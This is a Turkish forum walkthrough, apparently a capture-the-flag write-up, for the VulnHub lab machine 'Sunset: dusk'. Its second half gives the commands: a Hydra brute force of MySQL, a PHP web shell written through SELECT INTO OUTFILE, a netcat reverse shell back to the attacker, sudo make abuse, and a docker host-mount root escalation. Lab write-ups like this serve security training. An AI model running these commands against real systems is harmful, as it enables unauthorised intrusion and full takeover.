Merhabalar TürkHackTeam ailesi, bugün sizlere Sunset:dusk VulnHub Zafiyetli Makinesinin Çözümünü göstereceğim.
https://www.vulnhub.com/entry/sunset-dusk,404/
Makine İsmi: Sunset: dusk
Yayınlanma Tarihi: 1 Aralık 2019
Yapımcı: whitecr0wz
Seri: sunset
Açıklama: Hedefde ki user.txt ve root.txt dosyalarında ki flag'ı almak
Dosya Boyutu: 1.1 GB
İşletim Sistemi: Linux
Zorluk Derecesi: Kolay
İlk olarak makinenin IP adresini öğrenmek için
yazalım.
Makinenin IP adresini öğrendik.
Şimdi açık portları öğrenmek ve yolumuzu çizmek için NMAP taraması yapacağız. Terminale
yazalım.
Burada önemli nokta mysql'in açık olması
80 portu açıktı ve bir site olduğunu anladık, siteye girdiğimiz de sitede pekte bir şey bulamadık.
Ardından Hydra aracı ile MySQL'e Brute saldırı yapacağız. Bunun için
yazalım. Gördüğünüz gibi bilgiyi aldık kullanıcı adı: root şifre: password
Ardından sitenin 8080 portuna gittim ve /var/tmp olduğumuzu söylüyor bize. MySQL'i kullanarak buraya veri atacağız birazdan.
MySQL'e giriş yapmak için
yazalım ve şifreyi girelim. Ardından https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php buraya giderek kodları kopyalayıp bir php dosyası oluşturalım. Bu kodlarda biraz aşağıda CHANGE THİS kısımları var.
burada $ip = kendi makineninizin IP adresinizi yazınız.
Ardından MySQL'e
p4rs.php dosyasını ben kendim oluşturdum siz başka isimde de oluşturabilirsiniz.
Tarayıcıya IP_adresi:8080 yazdığımızda kendi oluşturduğumuz dosyamız içeride gördüğünüz gibi.
Tarayıcıya gelerek
yazdığımızda RCE komutu gördüğünüz gibi sistemde çalıştı.
Şimdi terminali açalım ve portu dinlemeye alalım
. Ardından tarayıcıya da
yazalım ve içeri girelim.
Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için
yazalım. Ardından home dizinine girip dusk dizinine girelim. Gördüğünüz gibi orada user.txt dosyasını bulduk yazdıralım ve ilk bayrağı alalım.
Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için
yazdık. groups yazdığımızda docker grubunda olduğunu öğrendik.
Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.
yazdık ve birkaç veri oluşturdu, içeri girdik.
id dediğimiz de root yetkisinde olduğumuzu gördük. Direk
yazdık ve root dizinine girdik.
yazdığımızda root.txt dosyası olduğunu gördük ve yazdırdık.
Gördüğünüz gibi iki bayrağı da aldık )
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...
https://www.vulnhub.com/entry/sunset-dusk,404/
Makine İsmi: Sunset: dusk
Yayınlanma Tarihi: 1 Aralık 2019
Yapımcı: whitecr0wz
Seri: sunset
Açıklama: Hedefde ki user.txt ve root.txt dosyalarında ki flag'ı almak
Dosya Boyutu: 1.1 GB
İşletim Sistemi: Linux
Zorluk Derecesi: Kolay
İlk olarak makinenin IP adresini öğrenmek için
Kod:
sudo netdiscover
Makinenin IP adresini öğrendik.
Şimdi açık portları öğrenmek ve yolumuzu çizmek için NMAP taraması yapacağız. Terminale
Kod:
nmap -A IP_adresi
Burada önemli nokta mysql'in açık olması
80 portu açıktı ve bir site olduğunu anladık, siteye girdiğimiz de sitede pekte bir şey bulamadık.
Ardından Hydra aracı ile MySQL'e Brute saldırı yapacağız. Bunun için
Kod:
hydra -L kullanıcı_adı_listesi -P şifre_listesi IP_adresi mysql
Ardından sitenin 8080 portuna gittim ve /var/tmp olduğumuzu söylüyor bize. MySQL'i kullanarak buraya veri atacağız birazdan.
MySQL'e giriş yapmak için
Kod:
mysql -h IP_adresi -u root -p
Kod:
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Ardından MySQL'e
Kod:
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/p4rs.php' ;
Tarayıcıya IP_adresi:8080 yazdığımızda kendi oluşturduğumuz dosyamız içeride gördüğünüz gibi.
Tarayıcıya gelerek
Kod:
http://IP_adresi:8080/p4rs.php?cmd=id
Şimdi terminali açalım ve portu dinlemeye alalım
Kod:
nc -lvp 1234
Kod:
http://IP_adresi:8080/p4rs.php?cmd=nc -e /bin/bash Kendi_IP_adresiniz 1234
Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için
Kod:
python -c "import pty;pty.spawn('/bin/bash')"
Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için
Kod:
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.
Kod:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
id dediğimiz de root yetkisinde olduğumuzu gördük. Direk
Kod:
cd /root
Kod:
ls
Gördüğünüz gibi iki bayrağı da aldık )
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...